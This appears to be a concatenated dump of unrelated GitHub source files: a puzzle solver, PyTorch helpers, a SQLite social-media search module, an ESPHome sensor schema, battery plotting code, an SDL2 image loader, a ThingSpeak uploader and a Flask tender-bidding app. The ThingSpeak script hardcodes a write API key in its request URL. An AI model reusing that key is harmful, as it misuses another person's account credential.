swap(state, 3, 4), swap(state, 3, 6)]) # 0 4 6\r\n elif pos0 == 4:\r\n list_states.extend([swap(state, 4, 1), swap(state, 4, 3), swap(state, 4, 5), swap(state, 4, 7)]) # 1 3 5 7\r\n elif pos0 == 5:\r\n list_states.extend([swap(state, 5, 2), swap(state, 5, 4), swap(state, 5, 8)]) # 2 4 8\r\n elif pos0 == 6:\r\n list_states.extend([swap(state, 6, 3), swap(state, 6, 7)]) # 3 7\r\n elif pos0 == 7:\r\n list_states.extend([swap(state, 7, 4), swap(state, 7, 6), swap(state, 7, 8)]) # 4 6 8\r\n elif pos0 == 8:\r\n list_states.extend([swap(state, 8, 5), swap(state, 8, 7)]) # 5 7\r\n return list_states\r\n\r\n\r\ndef swap(string1, a, b):\r\n list = []\r\n for s in string1:\r\n list.append(s)\r\n temp = list[a]\r\n list[a] = list[b]\r\n list[b] = temp\r\n str = ''.join(list)\r\n return str\r\n\r\n\r\nfinal_state = '012345678'\r\nbfs_len = possible_cases(final_state)\r\nprint(\"BFS: \", bfs_len)\r\n","repo_name":"2020ayao/8_puzzle","sub_path":"8_puzzle_EC.py","file_name":"8_puzzle_EC.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29383215935","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n\nimport os\nimport torch\nfrom torch.autograd import Variable\nimport errno\nimport torch.distributed as dist\nimport math\nfrom functools import reduce\ndef make_folder(path, version):\n if not os.path.exists(os.path.join(path, version)):\n print(os.path.join(path, version))\n os.makedirs(os.path.join(path, version))\n\n\ndef tensor2var(x, grad=False):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x, requires_grad=grad)\n\ndef var2tensor(x):\n return x.data.cpu()\n\ndef var2numpy(x):\n return x.data.cpu().numpy()\n\ndef denorm(x):\n out = (x + 1) / 2\n return out.clamp_(0, 1)\n\ndef mkdir_p(dirname):\n \"\"\" Like \"mkdir -p\", make a dir recursively, but do nothing if the dir exists\n Args:\n dirname(str):\n \"\"\"\n assert dirname is not None\n if dirname == '' or os.path.isdir(dirname):\n return\n try:\n os.makedirs(dirname)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise e\n\n\ndef skipShardSplit(aList, drop_last=False, num_replicas=None, rank=None):\n if not isinstance(aList, list) and not isinstance(aList, tuple):\n aList = List\n\n if num_replicas is None:\n num_replicas = dist.get_world_size() if dist.is_initialized() else 1\n if rank is None:\n rank = dist.get_rank() if dist.is_initialized() else 0\n\n num_replicas = num_replicas\n rank = rank\n drop_last = drop_last\n\n if drop_last:\n aList = aList[0: (len(aList) // num_replicas) * num_replicas]\n\n # subsample\n aList = aList[rank::num_replicas]\n\n return aList\n\ndef mixb2a(a,b):\n if len(b) > len(a):\n a,b = b,a\n if len(b) == 0:\n return a\n chunk_num = (len(b))\n a_chunk = splitIntoChunk(a, chunk_num)\n b_chunk = list(map(lambda x:[x],b))\n return reduce(lambda x, y: x+y, [_a+_b for _a,_b in zip(a_chunk, b_chunk)])\n\ndef splitIntoChunk(aList, chunk_num):\n return [aList[math.ceil(k * (len(aList) / chunk_num)):math.ceil((k + 1) * (len(aList) / chunk_num)):] for k in range(chunk_num)]","repo_name":"yinglinzheng/FTCN","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"67"} +{"seq_id":"30033886729","text":"from datetime import datetime\r\nimport sqlite3\r\n\r\n# Function to search for users matching a keyword\r\ndef search_users(conn, keyword, user_id):\r\n if keyword == '':\r\n print(\"no keyword to search for\")\r\n return\r\n # Create a cursor to interact with the database\r\n cursor = conn.cursor()\r\n\r\n # Execute an SQL query to search for users whose names contain the keyword\r\n cursor.execute(\"\"\"\r\n SELECT usr, name, city\r\n FROM users\r\n WHERE name LIKE ?\r\n ORDER BY\r\n CASE\r\n WHEN name = ? THEN 0\r\n ELSE LENGTH(name)\r\n END\r\n \"\"\", ('%' + keyword + '%', keyword,))\r\n \r\n # Fetch the search results for users with matching names\r\n usersname = cursor.fetchall()\r\n\r\n # Execute an SQL query to search for users whose cities and not names contain the keyword\r\n cursor.execute(\"\"\"\r\n SELECT usr, name, city\r\n FROM users\r\n WHERE city LIKE ? AND name NOT LIKE ?\r\n ORDER BY\r\n CASE\r\n WHEN city = ? THEN 0\r\n ELSE LENGTH(city)\r\n END\r\n \"\"\", ('%' + keyword + '%','%' + keyword + '%',keyword))\r\n\r\n # Fetch the search results for users with matching cities but not names\r\n userscity = cursor.fetchall()\r\n\r\n # Combine the results from both name and city searches\r\n users = usersname + userscity\r\n\r\n # Check if any matching users were found\r\n if len(users) == 0:\r\n print(\"No matching users found.\")\r\n return\r\n\r\n count = 0\r\n # Display the first 5 matching users\r\n for i in range(count, min(count + 5, len(users))):\r\n print(f\"{i + 1}. Name: {users[i][1]}\")\r\n\r\n count += 5\r\n\r\n while True:\r\n # case when search results contain more than 5 matching users\r\n if len(users) > 5:\r\n choice = input(\"'0' to view more or Enter the number of a user to see more information or 'back' to go back: \")\r\n if choice == 'back':\r\n return\r\n # If there are more than 5 matching users, provide an option to view more\r\n elif choice == '0':\r\n if count >= len(users):\r\n print(\"No more users.\")\r\n continue\r\n # prints the next 5 users \r\n for i in range(count, min(count + 5, len(users))):\r\n print(f\"{i + 1}. Name: {users[i][1]}\")\r\n count += 5\r\n elif choice.isdigit():\r\n # check if selected user is valid\r\n if int(choice) > 0 and int(choice) < (len(users) + 1):\r\n try:\r\n selected_user = users[int(choice) - 1]\r\n\r\n # displays the information about selected user\r\n user_info = get_user_info(conn, selected_user[0])\r\n display_user_info(user_info)\r\n goback = False\r\n count2 = 3\r\n while not goback:\r\n # ask user if they want to follow user or view more tweeets\r\n follow = input(\"'0' to follow user, '1' to view more tweets, 'back' to go back: \")\r\n if follow == '0':\r\n # Check if the user is already following the selected user\r\n cursor.execute(\"SELECT * FROM follows WHERE flwer = ? AND flwee = ?\", (user_id, selected_user[0]))\r\n existing_follow = cursor.fetchone()\r\n\r\n if existing_follow:\r\n print(\"You are already following this user.\")\r\n goback = True\r\n else:\r\n # Insert a new follow record\r\n cursor.execute(\"INSERT INTO follows VALUES (?, ?, ?)\", (user_id, selected_user[0], datetime.now().strftime('%Y-%m-%d')))\r\n print(\"You are now following this user.\")\r\n conn.commit()\r\n goback = True\r\n # prints 3 more tweets\r\n elif follow == '1' and (user_info['tweet_count'] > 3):\r\n print_more_tweets(user_info, count2)\r\n count2 += 3\r\n elif follow == '1' and (user_info['tweet_count'] <= 3):\r\n print(\"no more tweets\")\r\n elif follow == 'back':\r\n goback = True\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n except (ValueError, IndexError):\r\n print(\"Invalid choice. Please try again.\")\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\n # case when search results contain 5 of less matching users\r\n elif len(users) <= 5:\r\n choice = input(\"Enter the number of a user to see more information or 'back' to go back: \")\r\n if choice == 'back':\r\n return\r\n elif choice.isdigit():\r\n if int(choice) > 0 and int(choice) < (len(users) + 1):\r\n try:\r\n selected_user = users[int(choice) - 1]\r\n\r\n # displays the information about selected user\r\n user_info = get_user_info(conn, selected_user[0])\r\n display_user_info(user_info)\r\n goback = False\r\n count2 = 3\r\n while not goback:\r\n # ask user if they want to follow user or view more tweeets\r\n follow = input(\"'0' to follow user, '1' to view more tweets, 'back' to go back: \")\r\n if follow == '0':\r\n # Check if the user is already following the selected user\r\n cursor.execute(\"SELECT * FROM follows WHERE flwer = ? AND flwee = ?\", (user_id, selected_user[0]))\r\n existing_follow = cursor.fetchone()\r\n\r\n if existing_follow:\r\n print(\"You are already following this user.\")\r\n goback = True\r\n else:\r\n # Insert a new follow record\r\n cursor.execute(\"INSERT INTO follows VALUES (?, ?, ?)\", (user_id, selected_user[0], datetime.now().strftime('%Y-%m-%d')))\r\n print(\"You are now following this user.\")\r\n conn.commit()\r\n goback = True\r\n # prints 3 more tweets\r\n elif follow == '1' and (user_info['tweet_count'] > 3):\r\n print_more_tweets(user_info, count2)\r\n count2 += 3\r\n elif follow == '1' and (user_info['tweet_count'] <= 3):\r\n print(\"no more tweets\")\r\n elif follow == 'back':\r\n goback = True\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n except (ValueError, IndexError):\r\n print(\"Invalid choice. Please try again.\")\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\n# Function to retrieve user information\r\ndef get_user_info(conn, user_id):\r\n cursor = conn.cursor()\r\n\r\n # Get the number of tweets posted by the user\r\n cursor.execute(\"SELECT COUNT(*) FROM tweets WHERE writer = ?\", (user_id,))\r\n tweet_count = cursor.fetchone()[0]\r\n\r\n # Get the number of users being followed by the user\r\n cursor.execute(\"SELECT COUNT(*) FROM follows WHERE flwer = ?\", (user_id,))\r\n following_count = cursor.fetchone()[0]\r\n\r\n # Get the number of followers of the user\r\n cursor.execute(\"SELECT COUNT(*) FROM follows WHERE flwee = ?\", (user_id,))\r\n followers_count = cursor.fetchone()[0]\r\n\r\n # Get up to 3 most recent tweets of the user\r\n cursor.execute(\"\"\"\r\n SELECT tid, writer, tdate, text\r\n FROM tweets\r\n WHERE writer = ?\r\n ORDER BY tdate DESC\r\n \"\"\", (user_id,))\r\n recent_tweets = cursor.fetchall()\r\n\r\n # Return the retrieved user information as a dictionary\r\n return {\r\n 'tweet_count': tweet_count,\r\n 'following_count': following_count,\r\n 'followers_count': followers_count,\r\n 'recent_tweets': recent_tweets,\r\n }\r\n\r\n# Function to display user information\r\ndef display_user_info(user_info):\r\n print(f\"Number of Tweets: {user_info['tweet_count']}\")\r\n print(f\"Number of Following: {user_info['following_count']}\")\r\n print(f\"Number of Followers: {user_info['followers_count']}\")\r\n\r\n if user_info['recent_tweets']:\r\n print(\"Recent Tweets:\")\r\n for i in range(0, min(3, len(user_info['recent_tweets']))):\r\n print(f\" Text: {user_info['recent_tweets'][i][3]}\")\r\n\r\n# Function to print more recent tweets for a user\r\ndef print_more_tweets(user_info, count):\r\n if count >= user_info['tweet_count']:\r\n print(\"No more tweets\")\r\n else:\r\n print(\"Recent Tweets:\")\r\n for i in range(count, min(count + 3, user_info['tweet_count'])):\r\n print(f\" Text: {user_info['recent_tweets'][i][3]}\")\r\n","repo_name":"CejiroR/Personal-Projects","sub_path":"Twitter like Social Media Platform Project/search_users.py","file_name":"search_users.py","file_ext":"py","file_size_in_byte":9895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42105718957","text":"import esphome.codegen as cg\nimport esphome.config_validation as cv\nfrom esphome import pins\nfrom esphome.components import sensor\nfrom esphome.const import (\n CONF_COUNT_MODE,\n CONF_FALLING_EDGE,\n CONF_ID,\n CONF_INTERNAL_FILTER,\n CONF_PIN,\n CONF_RISING_EDGE,\n CONF_NUMBER,\n CONF_TOTAL,\n ICON_PULSE,\n STATE_CLASS_MEASUREMENT,\n STATE_CLASS_TOTAL_INCREASING,\n UNIT_PULSES_PER_MINUTE,\n UNIT_PULSES,\n)\nfrom esphome.core import CORE\n\npulse_counter_ns = cg.esphome_ns.namespace(\"pulse_counter\")\nPulseCounterCountMode = pulse_counter_ns.enum(\"PulseCounterCountMode\")\nCOUNT_MODES = {\n \"DISABLE\": PulseCounterCountMode.PULSE_COUNTER_DISABLE,\n \"INCREMENT\": PulseCounterCountMode.PULSE_COUNTER_INCREMENT,\n \"DECREMENT\": PulseCounterCountMode.PULSE_COUNTER_DECREMENT,\n}\n\nCOUNT_MODE_SCHEMA = cv.enum(COUNT_MODES, upper=True)\n\nPulseCounterSensor = pulse_counter_ns.class_(\n \"PulseCounterSensor\", sensor.Sensor, cg.PollingComponent\n)\n\n\ndef validate_internal_filter(value):\n value = cv.positive_time_period_microseconds(value)\n if CORE.is_esp32:\n if value.total_microseconds > 13:\n raise cv.Invalid(\"Maximum internal filter value for ESP32 is 13us\")\n return value\n\n return value\n\n\ndef validate_pulse_counter_pin(value):\n value = pins.internal_gpio_input_pin_schema(value)\n if CORE.is_esp8266 and value[CONF_NUMBER] >= 16:\n raise cv.Invalid(\n \"Pins GPIO16 and GPIO17 cannot be used as pulse counters on ESP8266.\"\n )\n return value\n\n\ndef validate_count_mode(value):\n rising_edge = value[CONF_RISING_EDGE]\n falling_edge = value[CONF_FALLING_EDGE]\n if rising_edge == \"DISABLE\" and falling_edge == \"DISABLE\":\n raise cv.Invalid(\n \"Can't set both count modes to DISABLE! This means no counting occurs at \"\n \"all!\"\n )\n return value\n\n\nCONFIG_SCHEMA = (\n sensor.sensor_schema(\n unit_of_measurement=UNIT_PULSES_PER_MINUTE,\n icon=ICON_PULSE,\n accuracy_decimals=2,\n state_class=STATE_CLASS_MEASUREMENT,\n )\n .extend(\n {\n cv.GenerateID(): cv.declare_id(PulseCounterSensor),\n cv.Required(CONF_PIN): validate_pulse_counter_pin,\n cv.Optional(\n CONF_COUNT_MODE,\n default={\n CONF_RISING_EDGE: \"INCREMENT\",\n CONF_FALLING_EDGE: \"DISABLE\",\n },\n ): cv.All(\n cv.Schema(\n {\n cv.Required(CONF_RISING_EDGE): COUNT_MODE_SCHEMA,\n cv.Required(CONF_FALLING_EDGE): COUNT_MODE_SCHEMA,\n }\n ),\n validate_count_mode,\n ),\n cv.Optional(CONF_INTERNAL_FILTER, default=\"13us\"): validate_internal_filter,\n cv.Optional(CONF_TOTAL): sensor.sensor_schema(\n unit_of_measurement=UNIT_PULSES,\n icon=ICON_PULSE,\n accuracy_decimals=0,\n state_class=STATE_CLASS_TOTAL_INCREASING,\n ),\n }\n )\n .extend(cv.polling_component_schema(\"60s\"))\n)\n\n\nasync def to_code(config):\n var = cg.new_Pvariable(config[CONF_ID])\n await cg.register_component(var, config)\n await sensor.register_sensor(var, config)\n\n pin = await cg.gpio_pin_expression(config[CONF_PIN])\n cg.add(var.set_pin(pin))\n count = config[CONF_COUNT_MODE]\n cg.add(var.set_rising_edge_mode(count[CONF_RISING_EDGE]))\n cg.add(var.set_falling_edge_mode(count[CONF_FALLING_EDGE]))\n cg.add(var.set_filter_us(config[CONF_INTERNAL_FILTER]))\n\n if CONF_TOTAL in config:\n sens = await sensor.new_sensor(config[CONF_TOTAL])\n cg.add(var.set_total_sensor(sens))\n","repo_name":"natelust/esphomeZephyr","sub_path":"esphome/components/pulse_counter/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"67"} +{"seq_id":"4527909294","text":"## @ingroup Visualization-Geometry-Three_Dimensional\n# RCAIDE/Visualization/Performance/Energy/Battery/plot_battery_degradation.py\n# \n# \n# Created: Jul 2023, M. Clarke\n\n# ----------------------------------------------------------------------------------------------------------------------\n# IMPORT\n# ---------------------------------------------------------------------------------------------------------------------- \nfrom RCAIDE.Core import Units\nfrom RCAIDE.Visualization.Common import set_axes, plot_style \nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np \n\n# ----------------------------------------------------------------------------------------------------------------------\n# PLOTS\n# ---------------------------------------------------------------------------------------------------------------------- \n## @ingroup Visualization-Performance-Energy-Battery\ndef plot_battery_degradation(results,\n save_figure = False,\n line_color = 'bo-',\n line_color2 = 'rs--',\n save_filename = \"Battery_Degradation\",\n file_type = \".png\",\n width = 12, height = 7):\n \"\"\"This plots the solar flux and power train performance of an solar powered aircraft\n\n Assumptions:\n None\n \n Source:\n None \n \n Inputs:\n results.segments.conditions.propulsion\n solar_flux\n battery_power_draw\n battery_energy\n \n Outputs:\n Plots\n \n Properties Used:\n N/A\n \"\"\" \n # get plotting style \n ps = plot_style() \n\n parameters = {'axes.labelsize': ps.axis_font_size,\n 'xtick.labelsize': ps.axis_font_size,\n 'ytick.labelsize': ps.axis_font_size,\n 'axes.titlesize': ps.title_font_size}\n plt.rcParams.update(parameters)\n \n\n for network in results.segments[0].analyses.energy.networks: \n busses = network.busses\n for bus in busses: \n for battery in bus.batteries: \n fig = plt.figure(save_filename + '_' + battery.tag)\n fig.set_size_inches(width,height) \n num_segs = len(results.segments)\n time_hrs = np.zeros(num_segs) \n capacity_fade = np.zeros_like(time_hrs)\n resistance_growth = np.zeros_like(time_hrs)\n cycle_day = np.zeros_like(time_hrs)\n charge_throughput = np.zeros_like(time_hrs) \n \n for i in range(len(results.segments)): \n time_hrs[i] = results.segments[i].conditions.frames.inertial.time[-1,0] / Units.hour \n battery_conditions = results.segments[i].conditions.energy[bus.tag][battery.tag] \n cycle_day[i] = battery_conditions.cell.cycle_in_day\n capacity_fade[i] = battery_conditions.cell.capacity_fade_factor\n resistance_growth[i] = battery_conditions.cell.resistance_growth_factor\n charge_throughput[i] = battery_conditions.cell.charge_throughput[-1,0] \n \n axis_1 = plt.subplot(3,2,1)\n axis_1.plot(charge_throughput, capacity_fade, color = ps.color , marker = ps.markers[0], linewidth = ps.line_width ) \n axis_1.set_ylabel('$E/E_0$')\n axis_1.set_xlabel('Ah')\n set_axes(axis_1) \n \n axis_2 = plt.subplot(3,2,3)\n axis_2.plot(time_hrs, capacity_fade, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width ) \n axis_2.set_ylabel('$E/E_0$')\n axis_2.set_xlabel('Time (hrs)')\n set_axes(axis_2) \n \n axis_3 = plt.subplot(3,2,5)\n axis_3.plot(cycle_day, capacity_fade, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width ) \n axis_3.set_ylabel('$E/E_0$')\n axis_3.set_xlabel('Time (days)')\n set_axes(axis_3) \n \n axis_4 = plt.subplot(3,2,2) \n axis_4.plot(charge_throughput, resistance_growth, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width )\n axis_4.set_ylabel('$R/R_0$')\n axis_4.set_xlabel('Ah')\n set_axes(axis_4) \n \n axis_5 = plt.subplot(3,2,4) \n axis_5.plot(time_hrs, resistance_growth, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width )\n axis_5.set_ylabel('$R/R_0$')\n axis_5.set_xlabel('Time (hrs)')\n set_axes(axis_5) \n \n axis_6 = plt.subplot(3,2,6) \n axis_6.plot(cycle_day, resistance_growth, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width )\n axis_6.set_ylabel('$R/R_0$')\n axis_6.set_xlabel('Time (days)')\n set_axes(axis_6) \n \n # set title of plot \n title_text = 'Battery Cell Degradation: ' + battery.tag \n fig.suptitle(title_text) \n \n plt.tight_layout() \n if save_figure: \n fig.savefig(save_filename + '_'+ battery.tag + file_type) \n \n return fig \n\n","repo_name":"leadsgroup/RCAIDE_UIUC","sub_path":"RCAIDE/Visualization/Energy/Battery/plot_battery_degradation.py","file_name":"plot_battery_degradation.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"1740972381","text":"#!/usr/bin/python\n\nimport sdl2\nimport pygame2\n\nfrom sdl2.ext.common import SDLError\nfrom sdl2.ext.compat import UnsupportedError, byteify\nfrom sdl2 import endian, surface, pixels\n\n_HASPIL = True\nfrom PIL import Image\n\n\ndef load(filename):\n if not pygame2.display.window:\n raise Exception(\"Error: Window has not yet been created.\")\n\n # Load the image using PIL so we get the SDL surface and PIL object.\n surface, pil_surface = load_image(filename)\n\n # Create a sprite.\n sprite = pygame2.display.window.factory.from_surface(surface)\n sprite.angle = 0\n sprite.pil = pil_surface\n\n # If we're using a software renderer, keep an original for rotation.\n if pygame2.display.window.type == \"software\":\n sprite.original = pygame2.display.window.factory.from_surface(surface, True)\n sprite.original.pil = pil_surface\n # If we're using a texture renderer, keep a software copy of the surface.\n else:\n sprite.sw_sprite = pygame2.display.window.sw_factory.from_surface(surface, True)\n sprite.sw_sprite.pil = pil_surface\n\n image = pygame2.Surface(sprite=sprite)\n\n return image\n\n\n\n\ndef load_image(fname, enforce=None):\n \"\"\"Creates a SDL_Surface from an image file.\n\n ** This is an altered version of the load_image method from pysdl2.\n\n This function makes use of the Python Imaging Library, if it is available\n on the target execution environment. The function will try to load the\n file via sdl2 first. If the file could not be loaded, it will try\n to load it via sdl2.sdlimage and PIL.\n\n You can force the function to use only one of them, by passing the enforce\n as either \"PIL\" or \"SDL\".\n\n Note: This will call sdl2.sdlimage.init() implicitly with the default\n arguments, if the module is available and if sdl2.SDL_LoadBMP() failed to\n load the image.\n\n fname can be either a string of the file to load or a PIL image object.\n\n \"\"\"\n\n if enforce is not None and enforce not in (\"PIL\", \"SDL\"):\n raise ValueError(\"enforce must be either 'PIL' or 'SDL', if set\")\n\n if type(fname) is str:\n name = byteify(fname, \"utf-8\")\n\n if enforce == \"PIL\" and not _HASPIL:\n raise UnsupportedError(load_image, \"cannot use PIL (not found)\")\n\n imgsurface = None\n\n if enforce != \"SDL\" and _HASPIL and not imgsurface:\n if type(fname) is str:\n image = Image.open(fname)\n else:\n image = fname\n mode = image.mode\n width, height = image.size\n rmask = gmask = bmask = amask = 0\n if mode in (\"1\", \"L\", \"P\"):\n # 1 = B/W, 1 bit per byte\n # \"L\" = greyscale, 8-bit\n # \"P\" = palette-based, 8-bit\n pitch = width\n depth = 8\n elif mode == \"RGB\":\n # 3x8-bit, 24bpp\n if endian.SDL_BYTEORDER == endian.SDL_LIL_ENDIAN:\n rmask = 0x0000FF\n gmask = 0x00FF00\n bmask = 0xFF0000\n else:\n rmask = 0xFF0000\n gmask = 0x00FF00\n bmask = 0x0000FF\n depth = 24\n pitch = width * 3\n elif mode in (\"RGBA\", \"RGBX\"):\n # RGBX: 4x8-bit, no alpha\n # RGBA: 4x8-bit, alpha\n if endian.SDL_BYTEORDER == endian.SDL_LIL_ENDIAN:\n rmask = 0x000000FF\n gmask = 0x0000FF00\n bmask = 0x00FF0000\n if mode == \"RGBA\":\n amask = 0xFF000000\n else:\n rmask = 0xFF000000\n gmask = 0x00FF0000\n bmask = 0x0000FF00\n if mode == \"RGBA\":\n amask = 0x000000FF\n depth = 32\n pitch = width * 4\n else:\n # We do not support CMYK or YCbCr for now\n raise TypeError(\"unsupported image format\")\n\n pxbuf = image.tostring()\n imgsurface = surface.SDL_CreateRGBSurfaceFrom(pxbuf, width, height,\n depth, pitch, rmask,\n gmask, bmask, amask)\n if not imgsurface:\n raise SDLError()\n imgsurface = imgsurface.contents\n # the pixel buffer must not be freed for the lifetime of the surface\n imgsurface._pxbuf = pxbuf\n\n if mode == \"P\":\n # Create a SDL_Palette for the SDL_Surface\n def _chunk(seq, size):\n for x in range(0, len(seq), size):\n yield seq[x:x + size]\n\n rgbcolors = image.getpalette()\n sdlpalette = pixels.SDL_AllocPalette(len(rgbcolors) // 3)\n if not sdlpalette:\n raise SDLError()\n sdlpalette = sdlpalette.contents\n SDL_Color = pixels.SDL_Color\n for idx, (r, g, b) in enumerate(_chunk(rgbcolors, 3)):\n sdlpalette.colors[idx] = SDL_Color(r, g, b)\n ret = surface.SDL_SetSurfacePalette(imgsurface, sdlpalette)\n # This will decrease the refcount on the palette, so it gets\n # freed properly on releasing the SDL_Surface.\n pixels.SDL_FreePalette(sdlpalette)\n if ret != 0:\n raise SDLError()\n\n return imgsurface, image\n","repo_name":"ShadowApex/pygame-sdl2","sub_path":"pygame2/image/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"13629214868","text":"#Irene Stone\r\n#Accessing thingSpeak from Thonny\r\n#Sept 2023\r\n\r\nimport time\r\nimport serial\r\nimport urllib.request\r\nser = serial.Serial()\r\nser.baudrate = 115200\r\nser.port = \"COM5\"\r\nser.open()\r\nwhile True:\r\n data1 = str(ser.readline())\r\n data1 = data1.replace(\"b\",\"\")\r\n data1 = data1.replace(\"'\",\"\")\r\n data1 = data1.replace(\"\\\\r\", \"\").replace(\"\\\\n\", \"\") # Remove \\r and \\n\r\n# data1 = data1.replace(\"celsius:\",\"\") #when using radio\r\n time.sleep(5)\r\n print(data1)\r\n msg = data1\r\n \r\n b=urllib.request.urlopen('https://api.thingspeak.com/update?api_key=BIZPFWPP6YGOAVHR&field1='+msg)\r\n\r\nser.close()\r\n","repo_name":"pdst-lccs/NW5","sub_path":"part5_mbToThonnyToThingSpeak.py","file_name":"part5_mbToThonnyToThingSpeak.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38221017328","text":"from flask import render_template, redirect, jsonify\nfrom flask import request\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom app import app\nfrom app.models import User, Database, load_user\nimport json\nfrom . import mysql\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\treturn render_template(\"index.html\")\n\n@app.route('/about')\ndef about():\n\treturn render_template(\"about.html\")\n\n@app.route('/signup',methods=['GET','POST'])\ndef signup():\n\tif request.method == 'GET':\n\t\treturn render_template(\"register.html\")\n\telse:\n\t\t#verify details\n\t\tdata = request.get_json()\n\t\tprint(data)\n\t\tif Database.addUser(data):\n\t\t\treturn \"User added successfully\"\n\t\telse:\n\t\t\treturn \"Error\",401\n\n@app.route('/login', methods=['POST'])\ndef login():\n\tdata = request.get_json()\n\tusername = data['username']\n\tpassword = data['password']\n\t#verify user\n\tif Database.login(username, password):\n\t\tuser = load_user(username)\n\t\tlogin_user(user)\n\t\treturn redirect(\"/user/\"+username)\n\telse:\n\t\treturn \"Incorrect credentials. Please try again.\",401\n\n@app.route(\"/getUser\")\n@login_required\ndef getUser():\n\treturn current_user.username\n\n@app.route(\"/logout\")\n@login_required\ndef logout():\n\tlogout_user()\n\treturn redirect(\"/\")\n\n@app.route(\"/user/\")\n@login_required\ndef home(username):\n\tdata = Database.getUser(username)\n\treturn jsonify(data[1])\n\n\t\n@app.route(\"/bids/\")\ndef bids(pname):\n\t#fetch details of pname and send it in this json\n\tproject = {'name':pname}\n\treturn render_template('bid.html', project = project)\n\t\n@app.route(\"/makebid/\")\ndef makebid(pname):\n\t#get required details needed for the project and accordingly populate the form queries\n\tproject = {'name':pname}\n\treturn render_template('makebid.html', project = project)\n\t\n@app.route(\"/bidplaced\", methods=['POST'])\ndef bidplaced():\n\treturn \"A\"\n\n@app.route(\"/search\")\ndef search():\n\treturn render_template('search.html',method=request.args.get('method'),data=request.args.get('text'))\n\t\n@app.route(\"/search_by\", methods=['POST'])\ndef search_by():\n\tmethod = request.json['method']\n\ttext = request.json['text']\n\tprint(method,text)\n\tdata = Database.search_by({'method':method, 'data':text})\n\tprint(data)\n\tif len(data)==0:\n\t return \"No Entries found\",401\n\treturn data\n\n@app.route(\"/addproject\", methods=['POST'])\n@login_required\ndef addProject():\n\tif current_user.access == \"admin\":\n\t\tprojDetails = request.get_json()\n\t\t#verify Data parameters\n\t\tif Database.addProject(data):\n\t\t#if successful\n\t\t\treturn \"Data saved successfully\"\n\t\telse:\n\t\t\treturn \"Error saving data\"\n\treturn \"Access denied\" \n'''\n@app.route(\"/project/id/\", methods=['GET'])\ndef showProject(id):\n\tdata = Database.getProject(project)\n\tif data is not False:\n\t\treturn jsonify(data)\n\telse:\n\t\treturn \"Project not found\"\n'''\n\n@app.route('/project/title/', methods=['GET'])\ndef disp_project(pname):\n\t#get project by project name\n\tdata = list(Database.getProject(pname))\n\tupdates=[]\n\ttenders=[]\n\tprint(data)\n\tif (current_user.access == \"admin\"):\n\t\tif(data[-1]=='a'):#if allocated send updates and specify type\n\t\t\ttype='a'\n\t\telse:#else send tenders and specify type\n\t\t\ttype='w'\n\t\t\t#tenders = Database.\n\t\t\t\n\telse:\n\t\t#dont send data but send 'contractor' as type\n\t\ttype='c'\n\tprint(type)\n\treturn render_template('proj_info.html', project = data, type= type, updates=updates, tenders=tenders)\n\t\n@app.route('/check', methods=['POST'])\ndef checkbid():\n\tdata = {'tender_id':5,'vender_id':6,'date':\"c\",'cost':10,'project_id':10}\n\tDatabase.addBid(data)\n\treturn \"asda\"\n\n@app.route('/admin', methods=['GET'])\n@login_required\ndef admin():\n if not (current_user.access == \"admin\"):\n return \"Access Denied\",401\n return render_template('admin.html',method=request.args.get('method'),data=request.args.get('text'))\n\n@app.route('/load_proj_data', methods=['POST'])\ndef load_proj_data():\n\tstatus = request.json['status']\n\tdata = Database.getAlloProject(status)\t\n\tprint((data))\n\treturn jsonify(list(data))\n\n@app.route('/contractor/', methods=['GET'])\n@login_required\ndef contractor(uname):\n if current_user.access == \"admin\" or current_user.username == uname:\n data = Database.getContractor(uname)\n if len(data)==0:\n return \"User not found\",404\n return render_template(\"contractor.html\",data = json.dumps(data))\n return \"Invalid access\",401\n\n@app.route('/getBid/')\n@login_required\ndef getBid(cname):\n if current_user.access == \"admin\" or current_user.username == cname:\n data = Database.getBid(cname)\n if len(data) == 0:\n return jsonify([])\n return jsonify(data)\n return \"Invalid access\",401\n","repo_name":"shashi1996/GTMS","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"9709688571","text":"from __future__ import absolute_import, print_function, division, unicode_literals\n\nimport logging\nfrom enum import Enum\nfrom itertools import chain\nimport time\nfrom itertools import islice\nfrom absl import flags\nfrom typing import Sequence, Iterable, Union, Tuple\n\nfrom benchmarks.driver.utils import UsageError, unique, try_with_default\nfrom benchmarks.driver.server import SalusServer\nfrom benchmarks.driver.server.config import presets\nfrom benchmarks.driver.workload import WTL, Executor, RunConfig, Workload\nfrom benchmarks.exps import run_seq, 